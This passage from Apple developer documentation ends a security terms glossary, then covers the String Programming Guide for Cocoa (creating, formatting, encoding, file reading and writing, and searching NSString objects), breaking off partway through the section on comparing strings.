The level of trust for a certificate is used together with the trust policy to answer the question “Should I trust this certificate for this action?”

nonrepudiation
A process or technique making it impossible for a user to deny performing an operation (such as using a specific credit card number).

Open Directory
The directory server provided by OS X for secure storage of passwords and user authentication.

permissions
See privileges.

phishing
A social engineering technique in which an email or web page that spoofs one from a legitimate business is used to trick a user into giving personal data and secrets (such as passwords) to someone who has malicious intent.

policy database
A database containing the set of rules the Security Server uses to determine authorization.

privileged operation
An operation that requires special rights or privileges.

privileges
The type of access to a file or directory (read, write, execute, traverse, and so forth) granted to a user or to a group.

race condition
The occurrence of two events out of sequence.

root kit
Malicious code that, by running in the kernel, can not only take over control of the system but can also cover up all evidence of its own existence.

root privileges
Having the unrestricted permission to perform any operation on the system.

script kiddie
Someone who uses published code (scripts) to attack software and computer systems.

signal
A message sent from one process to another in a UNIX-based operating system (such as OS X).

social engineering
As applied to security, tricking a user into giving up secrets or into giving access to a computer to an attacker.

smart card
A plastic card similar in size to a credit card that has memory and a microprocessor embedded in it. A smart card can store and process information, including passwords, certificates, and keys.

stack
A region of memory reserved for use by a specific program and used to control program flow.
Data is put on the stack and removed in a last-in–first-out fashion. The stack grows downward (toward lower memory addresses). Compare with heap.

stack overflow
A buffer overflow on the stack.

time of check–time of use (TOCTOU)
A race condition in which an attacker creates, writes to, or alters a file between the time when a program checks the status of the file and when the program writes to it.

trust policy
A set of rules that specify the appropriate uses for a certificate that has a specific level of trust. For example, the trust policy for a browser might state that if a certificate has expired, the user should be prompted for permission before a secure session is opened with a web server.

vulnerability
A feature of the way a program was written (either a design flaw or a bug) that makes it possible for a hacker or script kiddie to attack the program.
Apple Inc.
© 2012 Apple Inc.
All rights reserved.

No part of this publication may be reproduced, stored in a retrieval system, or transmitted, in any form or by any means, mechanical, electronic, photocopying, recording, or otherwise, without prior written permission of Apple Inc., with the following exceptions: Any person is hereby authorized to store documentation on a single computer for personal use only and to print copies of documentation for personal use provided that the documentation contains Apple’s copyright notice.
No licenses, express or implied, are granted with respect to any of the technology described in this document. Apple retains all intellectual property rights associated with the technology described in this document. This document is intended to assist application developers to develop applications only for Apple-labeled computers.

Apple Inc.
1 Infinite Loop
Cupertino, CA 95014
408-996-1010

Apple, the Apple logo, Carbon, Cocoa, eMac, FileVault, iPhone, Keychain, Mac, Macintosh, Numbers, Objective-C, OS X, Pages, and Safari are trademarks of Apple Inc., registered in the U.S. and other countries.

.Mac is a service mark of Apple Inc., registered in the U.S. and other countries.

App Store and Mac App Store are service marks of Apple Inc.

Java is a registered trademark of Oracle and/or its affiliates.

Ping is a registered trademark of Karsten Manufacturing and is used in the U.S. under license.

UNIX is a registered trademark of The Open Group.

iOS is a trademark or registered trademark of Cisco in the U.S. and other countries and is used under license.

Even though Apple has reviewed this document, APPLE MAKES NO WARRANTY OR REPRESENTATION, EITHER EXPRESS OR IMPLIED, WITH RESPECT TO THIS DOCUMENT, ITS QUALITY, ACCURACY, MERCHANTABILITY, OR FITNESS FOR A PARTICULAR PURPOSE. AS A RESULT, THIS DOCUMENT IS PROVIDED “AS IS,” AND YOU, THE READER, ARE ASSUMING THE ENTIRE RISK AS TO ITS QUALITY AND ACCURACY.

IN NO EVENT WILL APPLE BE LIABLE FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES RESULTING FROM ANY DEFECT OR INACCURACY IN THIS DOCUMENT, even if advised of the possibility of such damages.

THE WARRANTY AND REMEDIES SET FORTH ABOVE ARE EXCLUSIVE AND IN LIEU OF ALL OTHERS, ORAL OR WRITTEN, EXPRESS OR IMPLIED. No Apple dealer, agent, or employee is authorized to make any modification, extension, or addition to this warranty.
Some states do not allow the exclusion or limitation of implied warranties or liability for incidental or consequential damages, so the above limitation or exclusion may not apply to you. This warranty gives you specific legal rights, and you may also have other rights which vary from state to state.

String Programming Guide
2012-07-17 | © 1997, 2012 Apple Inc. All Rights Reserved.

Contents

Introduction to String Programming Guide for Cocoa
  Who Should Read This Document
  Organization of This Document
  See Also
Strings
Creating and Converting String Objects
  Creating Strings
    NSString from C Strings and Data
    Variable Strings
    Strings to Present to the User
  Combining and Extracting Strings
  Getting C Strings
  Conversion Summary
Formatting String Objects
  Formatting Basics
  Strings and Non-ASCII Characters
  NSLog and NSLogv
String Format Specifiers
  Format Specifiers
  Platform Dependencies
Reading Strings From and Writing Strings To Files and URLs
  Reading From Files and URLs
    Reading data with a known encoding
    Reading data with an unknown encoding
  Writing to Files and URLs
  Summary
Searching, Comparing, and Sorting Strings
  Search and Comparison Methods
    Searching strings
    Comparing and sorting strings
  Search and Comparison Options
  Examples
    Case-Insensitive Search for Prefix and Suffix
    Comparing Strings
    Sorting strings like Finder
Paragraphs and Line Breaks
  Line and Paragraph Separator Characters
  Separating a String “by Paragraph”
Characters and Grapheme Clusters
Character Sets
  Character Set Basics
  Creating Character Sets
  Performance considerations
  Creating a character set file
  Standard Character Sets and Unicode Definitions
Scanners
  Creating a Scanner
  Using a Scanner
  Example
Localization
String Representations of File Paths
  Representing a Path
  User Directories
  Path Components
  File Name Completion
Drawing Strings
Document Revision History
Index

Tables

String Format Specifiers
  Table 1 Format specifiers supported by the NSString formatting methods and CFString formatting functions
  Table 2 Length modifiers supported by the NSString formatting methods and CFString formatting functions
  Table 3 Format specifiers for data types

Introduction to String Programming Guide for Cocoa

String Programming Guide for Cocoa describes how to create, search, concatenate, and draw strings. It also describes character sets, which let you search a string for characters in a group, and scanners, which convert numbers to strings and vice versa.

Who Should Read This Document

You should read this document if you need to work directly with strings or character sets.

Organization of This Document

This document contains the following articles:
● “Strings” describes the characteristics of string objects in Cocoa.
● “Creating and Converting String Objects” explains the ways in which NSString and its subclass NSMutableString create string objects and convert their contents to and from the various character encodings they support.
● “Formatting String Objects” describes how to format NSString objects.
● “String Format Specifiers” describes printf-style format specifiers supported by NSString.
● “Reading Strings From and Writing Strings To Files and URLs” describes how to read strings from and write strings to files and URLs.
● “Searching, Comparing, and Sorting Strings” describes methods for finding characters and substrings within strings and for comparing one string to another.
● “Paragraphs and Line Breaks” describes how paragraphs and line breaks are represented.
● “Characters and Grapheme Clusters” describes how you can break strings down into user-perceived characters.
● “Character Sets” explains how to use character set objects, and how to use NSCharacterSet methods to create standard and custom character sets.
● “Scanners” describes NSScanner objects, which interpret and convert the characters of an NSString object into number and string values.
● “String Representations of File Paths” describes the NSString methods that manipulate strings as file-system paths.
● “Drawing Strings” discusses the methods of the NSString class that support drawing directly in an NSView object.

See Also

For more information, refer to the following documents:
● Attributed String Programming Guide is closely related to String Programming Guide for Cocoa. It provides information about NSAttributedString objects, which manage sets of attributes, such as font and kerning, that are associated with character strings or individual characters.
● Data Formatting Guide describes how to format data using objects that create, interpret, and validate text.
● Internationalization Programming Topics provides information about localizing strings in your project, including information on how string formatting arguments can be ordered.
● String Programming Guide for Core Foundation discusses the Core Foundation opaque type CFString, which is toll-free bridged with the NSString class.

Strings

String objects represent character strings in Cocoa frameworks. Representing strings as objects allows you to use strings wherever you use other objects. It also provides the benefits of encapsulation, so that string objects can use whatever encoding and storage is needed for efficiency while simply appearing as arrays of characters.

A string object is implemented as an array of Unicode characters (in other words, a text string). An immutable string is a text string that is defined when it is created and subsequently cannot be changed. To create and manage an immutable string, use the NSString class. To construct and manage a string that can be changed after it has been created, use NSMutableString.

The objects you create using NSString and NSMutableString are referred to as string objects (or, when no confusion will result, merely as strings). The term C string refers to the standard C char * type.

A string object presents itself as an array of Unicode characters. You can determine how many characters it contains with the length method and can retrieve a specific character with the characterAtIndex: method. These two “primitive” methods provide basic access to a string object. Most use of strings, however, is at a higher level, with the strings being treated as single entities: You compare strings against one another, search them for substrings, combine them into new strings, and so on.
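The characters that length counts are 16-bit Unicode code units (unichar values), which is not always the number of characters a reader perceives. The C sketch below is not from the original guide: utf16_unit_count is a hypothetical helper, and it assumes well-formed, null-terminated UTF-8 input. It only illustrates how many 16-bit units a given text would occupy.

```c
#include <stddef.h>

/* Hypothetical helper (not an Apple API): counts how many 16-bit code
   units a well-formed, null-terminated UTF-8 string occupies when it is
   stored as UTF-16. Malformed input is not detected. */
size_t utf16_unit_count(const char *utf8) {
    size_t units = 0;
    for (const unsigned char *p = (const unsigned char *)utf8; *p != 0; p++) {
        if ((*p & 0xC0) == 0x80) {
            continue;  /* continuation byte: its sequence was already counted */
        }
        /* A 4-byte sequence (lead byte 11110xxx) encodes a code point above
           U+FFFF, which needs a surrogate pair, that is, two code units. */
        units += ((*p & 0xF8) == 0xF0) ? 2 : 1;
    }
    return units;
}
```

For instance, passing "e\xCC\x81" (the letter e followed by a combining acute accent) yields 2, although the text is displayed as a single accented letter.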
If you need to access string objects character-by-character, you must understand the Unicode character encoding, specifically issues related to composed character sequences. For details see:
● The Unicode Standard, Version 4.0. The Unicode Consortium. Boston: Addison-Wesley, 2003. ISBN 0-321-18578-1.
● The Unicode Consortium web site: http://www.unicode.org/.

Creating and Converting String Objects

NSString and its subclass NSMutableString provide several ways to create string objects, most based around the various character encodings it supports. Although string objects always present their own contents as Unicode characters, they can convert their contents to and from many other encodings, such as 7-bit ASCII, ISO Latin 1, EUC, and Shift-JIS. The availableStringEncodings class method returns the encodings supported. You can specify an encoding explicitly when converting a C string to or from a string object, or use the default C string encoding, which varies from platform to platform and is returned by the defaultCStringEncoding class method.

Creating Strings

The simplest way to create a string object in source code is to use the Objective-C @"..." construct:

    NSString *temp = @"Contrafibularity";

Note that, when creating a string constant in this fashion, you should use UTF-8 characters. Such an object is created at compile time and exists throughout your program’s execution. The compiler makes such object constants unique on a per-module basis, and they’re never deallocated. You can also send messages directly to a string constant as you do any other string:

    BOOL same = [@"comparison" isEqualToString:myString];

NSString from C Strings and Data

To create an NSString object from a C string, you use methods such as initWithCString:encoding:. You must correctly specify the character encoding of the C string. Similar methods allow you to create string objects from characters in a variety of encodings.
The method initWithData:encoding: allows you to convert string data stored in an NSData object into an NSString object.

    char *utf8String = /* Assume this exists. */ ;
    NSString *stringFromUTFString = [[NSString alloc] initWithUTF8String:utf8String];

    char *macOSRomanEncodedString = /* assume this exists */ ;
    NSString *stringFromMORString =
        [[NSString alloc] initWithCString:macOSRomanEncodedString
                                 encoding:NSMacOSRomanStringEncoding];

    NSData *shiftJISData = /* assume this exists */ ;
    NSString *stringFromShiftJISData =
        [[NSString alloc] initWithData:shiftJISData
                              encoding:NSShiftJISStringEncoding];

The following example converts an NSString object containing a non-ASCII Unicode character to ASCII data, then back to an NSString object.

    unichar ellipsis = 0x2026;
    NSString *theString = [NSString stringWithFormat:@"To be continued%C", ellipsis];

    // Lossy conversion replaces the ellipsis character with three ASCII periods.
    NSData *asciiData = [theString dataUsingEncoding:NSASCIIStringEncoding
                                allowLossyConversion:YES];
    NSString *asciiString = [[NSString alloc] initWithData:asciiData
                                                  encoding:NSASCIIStringEncoding];

    // length returns an NSUInteger, so cast to unsigned long and use %lu.
    NSLog(@"Original: %@ (length %lu)", theString, (unsigned long)[theString length]);
    NSLog(@"Converted: %@ (length %lu)", asciiString, (unsigned long)[asciiString length]);

    // output:
    // Original: To be continued… (length 16)
    // Converted: To be continued... (length 18)

Variable Strings

To create a variable string, you typically use stringWithFormat: or initWithFormat: (or for localized strings, localizedStringWithFormat:). These methods and their siblings use a format string as a template into which the values you provide (string and other objects, numeric values, and so on) are inserted. They and the supported format specifiers are described in “Formatting String Objects”.
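The template idea behind stringWithFormat: is the same one that printf uses in C. As a rough sketch only, the following C code fills a format string with values and reports truncation rather than writing past the buffer. The function name describe_houses and the message text are illustrative assumptions, not part of any Apple API.

```c
#include <stdio.h>
#include <stddef.h>

/* Hypothetical helper: writes "<count> houses on <street>" into out.
   Returns 0 on success, or -1 if formatting failed or the result did
   not fit in the size bytes available. */
int describe_houses(char *out, size_t size, int count, const char *street) {
    int needed = snprintf(out, size, "%d houses on %s", count, street);
    if (needed < 0 || (size_t)needed >= size) {
        return -1;  /* encoding error or truncated output */
    }
    return 0;
}
```

A caller would pass a buffer and its size, for example describe_houses(buf, sizeof buf, 3, "Elm Street"), and check the return value before using the buffer.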
You can build a string from existing string objects using the methods stringByAppendingString: and stringByAppendingFormat: to create a new string by adding one string after another, in the second case using a format string.

    NSString *hString = @"Hello";
    NSString *hwString = [hString stringByAppendingString:@", world!"];

Strings to Present to the User

When creating strings to present to the user, you should consider the importance of localizing your application. In general, you should avoid creating user-visible strings directly in code. Instead you should use strings in your code as a key to a localization dictionary that will supply the user-visible string in the user's preferred language. Typically this involves using NSLocalizedString and similar macros, as illustrated in the following example.

    // Arguments are the key, the table name, and a comment for translators.
    NSString *greeting = NSLocalizedStringFromTable(@"Hello", @"greetings",
                             @"greeting to present in first launch panel");

For more about internationalizing your application, see Internationalization Programming Topics. “Localizing String Resources” describes how to work with and reorder variable arguments in localized strings.

Combining and Extracting Strings

You can combine and extract strings in various ways. The simplest way to combine two strings is to append one to the other. The stringByAppendingString: method returns a string object formed from the receiver and the given argument.

    NSString *beginning = @"beginning";
    NSString *alphaAndOmega = [beginning stringByAppendingString:@" and end"];
    // alphaAndOmega is @"beginning and end"

You can also combine several strings according to a template with the initWithFormat:, stringWithFormat:, and stringByAppendingFormat: methods; these are described in more detail in “Formatting String Objects”.
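The append operation described above returns a new string object and leaves the receiver unchanged. For comparison, here is a C analogue of that behavior, sketched under the assumption that the caller frees the result; append_copy is a hypothetical name, not a library function.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: returns a newly allocated string holding first
   followed by second, or NULL if allocation fails. Neither input is
   modified; the caller must free() the result. */
char *append_copy(const char *first, const char *second) {
    size_t first_len = strlen(first);
    size_t second_len = strlen(second);
    char *joined = malloc(first_len + second_len + 1);   /* +1 for '\0' */
    if (joined == NULL) {
        return NULL;
    }
    memcpy(joined, first, first_len);
    memcpy(joined + first_len, second, second_len + 1);  /* copies '\0' too */
    return joined;
}
```

Sizing the buffer from both lengths before copying is what keeps this from overflowing, which is the bookkeeping that string objects handle for you.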
You can extract substrings from the beginning or end of a string to a particular index, or from a specific range, with the substringToIndex:, substringFromIndex:, and substringWithRange: methods. You can also split a string into substrings (based on a separator string) with the componentsSeparatedByString: method. These methods are illustrated in the following examples. Notice that the index of the index-based methods starts at 0:

    NSString *source = @"0123456789";

    NSString *firstFour = [source substringToIndex:4];
    // firstFour is @"0123"

    NSString *allButFirstThree = [source substringFromIndex:3];
    // allButFirstThree is @"3456789"

    // NSMakeRange takes a location and a length: 4 characters starting at index 2.
    NSRange twoToSixRange = NSMakeRange(2, 4);
    NSString *twoToSix = [source substringWithRange:twoToSixRange];
    // twoToSix is @"2345"

    NSArray *split = [source componentsSeparatedByString:@"45"];
    // split contains { @"0123", @"6789" }

If you need to extract strings using pattern-matching rather than an index, you should use a scanner (see “Scanners”).

Getting C Strings

To get a C string from a string object, the recommended method is UTF8String. This returns a const char * using UTF8 string encoding.

    const char *cString = [@"Hello, world" UTF8String];

The C string you receive is owned by a temporary object, and will become invalid when automatic deallocation takes place. If you want to get a permanent C string, you must create a buffer and copy the contents of the const char * returned by the method.

Similar methods allow you to create string objects from characters in the Unicode encoding or an arbitrary encoding, and to extract data in these encodings. initWithData:encoding: and dataUsingEncoding: perform these conversions from and to NSData objects.

Conversion Summary

This table summarizes the most common means of creating and converting string objects:

    Source              Creation method                 Extraction method
    In code             @"..." compiler construct       N/A
    UTF8 encoding       stringWithUTF8String:           UTF8String
    Unicode encoding    stringWithCharacters:length:    getCharacters:, getCharacters:range:
    Arbitrary encoding  initWithData:encoding:          dataUsingEncoding:
    Existing strings    stringByAppendingString:,       N/A
                        stringByAppendingFormat:
    Format string       localizedStringWithFormat:,     Use NSScanner
                        initWithFormat:locale:
    Localized strings   NSLocalizedString and similar   N/A

Formatting String Objects

This article describes how to create a string using a format string, how to use non-ASCII characters in a format string, and a common error that developers make when using NSLog or NSLogv.

Formatting Basics

NSString uses a format string whose syntax is similar to that used by other formatter objects. It supports the format characters defined for the ANSI C function printf(), plus %@ for any object (see “String Format Specifiers” and the IEEE printf specification). If the object responds to descriptionWithLocale: messages, NSString sends such a message to retrieve the text representation. Otherwise, it sends a description message. “Localizing String Resources” describes how to work with and reorder variable arguments in localized strings.

In format strings, a ‘%’ character announces a placeholder for a value, with the characters that follow determining the kind of value expected and how to format it. For example, a format string of "%d houses" expects an integer value to be substituted for the format expression '%d'.

Value formatting is affected by the user’s current locale, which is an NSDictionary object that specifies number, date, and other kinds of formats.
NSString uses only the locale’s definition for the decimal separator (given by the key named NSDecimalSeparator). If you use a method that doesn’t specify a locale, the string assumes the default locale.

You can use NSString’s stringWithFormat: method and other related methods to create strings with printf-style format specifiers and argument lists, as described in “Creating and Converting String Objects”. The examples below illustrate how you can create a string using a variety of format specifiers and arguments.

    NSString *string1 = [NSString stringWithFormat:@"A string: %@, a float: %1.2f",
                                                   @"string", 31415.9265];
    // string1 is "A string: string, a float: 31415.93"

    NSNumber *number = @1234;
    // The key is @"date" and the value is the current date, matching the output below.
    NSDictionary *dictionary = @{ @"date": [NSDate date] };
    NSString *baseString = @"Base string.";
    NSString *string2 = [baseString stringByAppendingFormat:
            @" A number: %@, a dictionary: %@", number, dictionary];
    // string2 is "Base string. A number: 1234, a dictionary: {date = 2005-10-17 09:02:01 -0700; }"

Strings and Non-ASCII Characters

You can include non-ASCII characters (including Unicode) in strings using methods such as stringWithFormat: and stringWithUTF8String:.

    NSString *s = [NSString stringWithFormat:@"Long %C dash", 0x2014];

Since \xe2\x80\x94 is the 3-byte UTF-8 string for 0x2014, you could also write:

    NSString *s = [NSString stringWithUTF8String:"Long \xe2\x80\x94 dash"];

NSLog and NSLogv

The utility functions NSLog() and NSLogv() use the NSString string formatting services to log error messages. As a consequence, you should take care when specifying the argument for these functions. A common mistake is to specify a string that includes formatting characters, as shown in the following example.
    NSString *string = @"A contrived string %@";
    NSLog(string);
    // The application will probably crash here due to signal 10 (SIGBUS)

It is better (safer) to use a format string to output another string, as shown in the following example.

    NSString *string = @"A contrived string %@";
    NSLog(@"%@", string);
    // Output: A contrived string %@

String Format Specifiers

This article summarizes the format specifiers supported by string formatting methods and functions.

Format Specifiers

The format specifiers supported by the NSString formatting methods and CFString formatting functions follow the IEEE printf specification; the specifiers are summarized in Table 1. Note that you can also use the “n$” positional specifiers such as %1$@ %2$s. For more details, see the IEEE printf specification. You can also use these format specifiers with the NSLog function.

Table 1 Format specifiers supported by the NSString formatting methods and CFString formatting functions

    Specifier   Description
    %@          Objective-C object, printed as the string returned by descriptionWithLocale: if available, or description otherwise. Also works with CFTypeRef objects, returning the result of the CFCopyDescription function.
    %%          '%' character.
    %d, %D      Signed 32-bit integer (int).
    %u, %U      Unsigned 32-bit integer (unsigned int).
    %x          Unsigned 32-bit integer (unsigned int), printed in hexadecimal using the digits 0–9 and lowercase a–f.
    %X          Unsigned 32-bit integer (unsigned int), printed in hexadecimal using the digits 0–9 and uppercase A–F.
    %o, %O      Unsigned 32-bit integer (unsigned int), printed in octal.
    %f          64-bit floating-point number (double).
    %e          64-bit floating-point number (double), printed in scientific notation using a lowercase e to introduce the exponent.
    %E          64-bit floating-point number (double), printed in scientific notation using an uppercase E to introduce the exponent.
    %g          64-bit floating-point number (double), printed in the style of %e if the exponent is less than –4 or greater than or equal to the precision, in the style of %f otherwise.
    %G          64-bit floating-point number (double), printed in the style of %E if the exponent is less than –4 or greater than or equal to the precision, in the style of %f otherwise.
    %c          8-bit unsigned character (unsigned char), printed by NSLog() as an ASCII character, or, if not an ASCII character, in the octal format \ddd or the Unicode hexadecimal format \udddd, where d is a digit.
    %C          16-bit Unicode character (unichar), printed by NSLog() as an ASCII character, or, if not an ASCII character, in the octal format \ddd or the Unicode hexadecimal format \udddd, where d is a digit.
    %s          Null-terminated array of 8-bit unsigned characters. Because the %s specifier causes the characters to be interpreted in the system default encoding, the results can be variable, especially with right-to-left languages. For example, with RTL, %s inserts direction markers when the characters are not strongly directional. For this reason, it’s best to avoid %s and specify encodings explicitly.
    %S          Null-terminated array of 16-bit Unicode characters.
    %p          Void pointer (void *), printed in hexadecimal with the digits 0–9 and lowercase a–f, with a leading 0x.
    %a          64-bit floating-point number (double), printed in scientific notation with a leading 0x and one hexadecimal digit before the decimal point using a lowercase p to introduce the exponent.
    %A          64-bit floating-point number (double), printed in scientific notation with a leading 0X and one hexadecimal digit before the decimal point using an uppercase P to introduce the exponent.
    %F          64-bit floating-point number (double), printed in decimal notation.
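Several entries in Table 1 behave the same way in plain C, so they can be tried without Cocoa. The sketch below is not from the original guide: it assumes a POSIX C library (the “n$” positional form is a POSIX extension to ISO C), and the function names are hypothetical. It shows positional specifiers, %x and %X, and the %% escape.

```c
#include <stdio.h>
#include <stddef.h>

/* Hypothetical helper showing "n$" positional specifiers: the same two
   arguments are written in either order by changing only the format. */
int format_pair(char *out, size_t size, int swapped,
                const char *first, const char *second) {
    if (swapped) {
        return snprintf(out, size, "%2$s, %1$s", first, second);
    }
    return snprintf(out, size, "%1$s, %2$s", first, second);
}

/* Hypothetical helper: writes value in lowercase and uppercase
   hexadecimal, followed by a literal percent sign written as %%. */
int format_hex(char *out, size_t size, unsigned int value) {
    return snprintf(out, size, "%x %X 100%%", value, value);
}
```

Positional specifiers matter mostly for localization, where a translated format string may need its arguments in a different order than the code supplies them.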
Table 2 Length modifiers supported by the NSString formatting methods and CFString formatting functions

    Length modifier   Description
    h                 Length modifier specifying that a following d, o, u, x, or X conversion specifier applies to a short or unsigned short argument.
    hh                Length modifier specifying that a following d, o, u, x, or X conversion specifier applies to a signed char or unsigned char argument.
    l                 Length modifier specifying that a following d, o, u, x, or X conversion specifier applies to a long or unsigned long argument.
    ll, q             Length modifiers specifying that a following d, o, u, x, or X conversion specifier applies to a long long or unsigned long long argument.
    L                 Length modifier specifying that a following a, A, e, E, f, F, g, or G conversion specifier applies to a long double argument.
    z                 Length modifier specifying that a following d, o, u, x, or X conversion specifier applies to a size_t or the corresponding signed integer type argument.
    t                 Length modifier specifying that a following d, o, u, x, or X conversion specifier applies to a ptrdiff_t or the corresponding unsigned integer type argument.
    j                 Length modifier specifying that a following d, o, u, x, or X conversion specifier applies to an intmax_t or uintmax_t argument.

Platform Dependencies

OS X uses several data types (NSInteger, NSUInteger, CGFloat, and CFIndex) to provide a consistent means of representing values in 32- and 64-bit environments. In a 32-bit environment, NSInteger and NSUInteger are defined as int and unsigned int, respectively. In 64-bit environments, NSInteger and NSUInteger are defined as long and unsigned long, respectively. To avoid the need to use different printf-style type specifiers depending on the platform, you can use the specifiers shown in Table 3. Note that in some cases you may have to cast the value.
Table 3  Format specifiers for data types

Type          Format specifier    Considerations
NSInteger     %ld or %lx          Cast the value to long.
NSUInteger    %lu or %lx          Cast the value to unsigned long.
CGFloat       %f or %g            %f works for floats and doubles when formatting; but note the technique described below for scanning.
CFIndex       %ld or %lx          The same as NSInteger.
pointer       %p or %zx           %p adds 0x to the beginning of the output. If you don't want that, use %zx and no typecast.

The following example illustrates the use of %ld to format an NSInteger and the use of a cast.

    NSInteger i = 42;
    printf("%ld\n", (long)i);

In addition to the considerations mentioned in Table 3, there is one extra case with scanning: you must distinguish the types for float and double. You should use %f for float, %lf for double. If you need to use scanf (or a variant thereof) with CGFloat, switch to double instead, and copy the double to CGFloat.

    CGFloat imageWidth;
    double tmp;
    sscanf (str, "%lf", &tmp);
    imageWidth = tmp;

It is important to remember that %lf is not a portable scanning specifier for CGFloat: it matches only where CGFloat is a double (64-bit) and is wrong where CGFloat is a float (32-bit). This is unlike %ld, which works for long in all cases.

Reading Strings From and Writing Strings To Files and URLs

Reading files or URLs using NSString is straightforward provided that you know what encoding the resource uses. If you don't know the encoding, reading a resource is more challenging. When you write to a file or URL, you must specify the encoding to use. (Where possible, you should use URLs because these are more efficient.)

Reading From Files and URLs

NSString provides a variety of methods to read data from files and URLs. In general, it is much easier to read data if you know its encoding. If you have plain text and no knowledge of the encoding, you are already in a difficult position.
You should avoid placing yourself in this position if at all possible: anything that calls for the use of plain text files should specify the encoding (preferably UTF-8 or UTF-16+BOM).

Reading data with a known encoding

To read from a file or URL for which you know the encoding, you use stringWithContentsOfFile:encoding:error: or stringWithContentsOfURL:encoding:error:, or the corresponding init... method, as illustrated in the following example.

    NSURL *URL = ...;
    NSError *error;
    NSString *stringFromFileAtURL = [[NSString alloc]
        initWithContentsOfURL:URL
        encoding:NSUTF8StringEncoding
        error:&error];
    if (stringFromFileAtURL == nil) {
        // an error occurred
        NSLog(@"Error reading file at %@\n%@", URL, [error localizedFailureReason]);
        // implementation continues ...

You can also initialize a string using a data object, as illustrated in the following examples. Again, you must specify the correct encoding.

    NSURL *URL = ...;
    NSData *data = [NSData dataWithContentsOfURL:URL];

    // Assuming data is in UTF-8. The bytes of an NSData object are not
    // NUL-terminated, so use an initializer that takes the data's length
    // into account rather than stringWithUTF8String:.
    NSString *string = [[NSString alloc] initWithData:data
        encoding:NSUTF8StringEncoding];

    // If data is in another encoding, for example ISO-8859-1:
    NSString *latin1String = [[NSString alloc] initWithData:data
        encoding:NSISOLatin1StringEncoding];

Reading data with an unknown encoding

If you find yourself with text of unknown encoding, it is best to make sure that there is a mechanism for correcting the inevitable errors. For example, Apple's Mail and Safari applications have encoding menus, and TextEdit allows the user to reopen the file with an explicitly specified encoding.

If you are forced to guess the encoding (and note that in the absence of explicit information, it is a guess):

1. Try stringWithContentsOfFile:usedEncoding:error: or initWithContentsOfFile:usedEncoding:error: (or the URL-based equivalents).
   These methods try to determine the encoding of the resource, and if successful return by reference the encoding used.
2. If (1) fails, try to read the resource by specifying UTF-8 as the encoding.
3. If (2) fails, try an appropriate legacy encoding. "Appropriate" here depends a bit on circumstances; it might be the default C string encoding, it might be ISO or Windows Latin 1, or something else, depending on where your data are coming from.
4. Finally, you can try NSAttributedString's loading methods from the Application Kit (such as initWithURL:options:documentAttributes:error:). These methods attempt to load plain text files, and return the encoding used. They can be used on more-or-less arbitrary text documents, and are worth considering if your application has no special expertise in text. They might not be as appropriate for Foundation-level tools or documents that are not natural-language text.

Writing to Files and URLs

Compared with reading data from a file or URL, writing is straightforward. NSString provides two convenient methods, writeToFile:atomically:encoding:error: and writeToURL:atomically:encoding:error:. You must specify the encoding that should be used, and choose whether to write the resource atomically or not. If you do not choose to write atomically, the string is written directly to the path you specify. If you choose to write it atomically, it is written first to an auxiliary file, and then the auxiliary file is renamed to the path. This option guarantees that the file, if it exists at all, won't be corrupted even if the system should crash during writing. If you write to a URL, the atomicity option is ignored if the destination is not of a type that can be accessed atomically.
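The write-then-rename idea behind an atomic write can be sketched in plain C. This is only an illustration of the technique, not how Foundation implements it. The function name write_atomically and the ".tmp" suffix are hypothetical, and the sketch assumes POSIX semantics, where rename() replaces an existing destination in a single step (the C standard leaves that case implementation-defined). A production version would also flush the data to stable storage before renaming.

```c
#include <stdio.h>

/* Writes len bytes to path by way of a temporary sibling file.
   Returns 0 on success and -1 on failure. */
int write_atomically(const char *path, const void *data, size_t len) {
    char tmp[1024];
    int n = snprintf(tmp, sizeof tmp, "%s.tmp", path);
    if (n < 0 || (size_t)n >= sizeof tmp) return -1;  /* path too long */

    FILE *f = fopen(tmp, "wb");
    if (f == NULL) return -1;

    int ok = fwrite(data, 1, len, f) == len;
    if (fclose(f) != 0) ok = 0;   /* fclose flushes buffered data */

    /* Only a completely written file is ever moved into place. */
    if (ok && rename(tmp, path) == 0) return 0;

    remove(tmp);                  /* clean up after any failure */
    return -1;
}
```

Because the destination is touched only by the final rename, a reader sees either the old contents or the complete new contents. In Foundation you request the equivalent behavior with the atomically: argument.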
    NSURL *URL = ...;
    NSString *string = ...;
    NSError *error;
    BOOL ok = [string writeToURL:URL atomically:YES
        encoding:NSUnicodeStringEncoding error:&error];
    if (!ok) {
        // an error occurred
        NSLog(@"Error writing file at %@\n%@", URL, [error localizedFailureReason]);
        // implementation continues ...

Summary

This table summarizes the most common means of reading and writing string objects to and from files and URLs:

Source           Creation method                                   Extraction method
URL contents     stringWithContentsOfURL:encoding:error:           writeToURL:atomically:encoding:error:
                 stringWithContentsOfURL:usedEncoding:error:
File contents    stringWithContentsOfFile:encoding:error:          writeToFile:atomically:encoding:error:
                 stringWithContentsOfFile:usedEncoding:error:

Searching, Comparing, and Sorting Strings

The string classes provide methods for finding characters and substrings within strings and for comparing one string to another. These methods conform to the Unicode standard for determining whether two character sequences are equivalent. The string classes provide comparison methods that handle composed character sequences properly, though you do have the option of specifying a literal search when efficiency is important and you can guarantee some canonical form for composed character sequences.

Search and Comparison Methods

The search and comparison methods each come in several variants. The simplest version of each searches or compares entire strings. Other variants allow you to alter the way comparison of composed character sequences is performed and to specify a specific range of characters within a string to be searched or compared; you can also search and compare strings in the context of a given locale.
These are the basic search and comparison methods:

Search methods                              Comparison methods
rangeOfString:                              compare:
rangeOfString:options:                      compare:options:
rangeOfString:options:range:                compare:options:range:
rangeOfString:options:range:locale:         compare:options:range:locale:
rangeOfCharacterFromSet:
rangeOfCharacterFromSet:options:
rangeOfCharacterFromSet:options:range:

Searching strings

You use the rangeOfString:... methods to search for a substring within the receiver. The rangeOfCharacterFromSet:... methods search for individual characters from a supplied set of characters.

Substrings are found only if completely contained within the specified range. If you specify a range for a search or comparison method and don't request NSLiteralSearch (see below), the range must not break composed character sequences on either end; if it does, you could get an incorrect result. (See the method description for rangeOfComposedCharacterSequenceAtIndex: for a code sample that adjusts a range to lie on character sequence boundaries.)

You can also scan a string object for numeric and string values using an instance of NSScanner. For more about scanners, see "Scanners". Both the NSString and the NSScanner class clusters use the NSCharacterSet class cluster for search operations. For more about character sets, see "Character Sets".

If you simply want to determine whether a string contains a given pattern, you can use a predicate:

    BOOL match = [myPredicate evaluateWithObject:myString];

For more about predicates, see Predicate Programming Guide.

Comparing and sorting strings

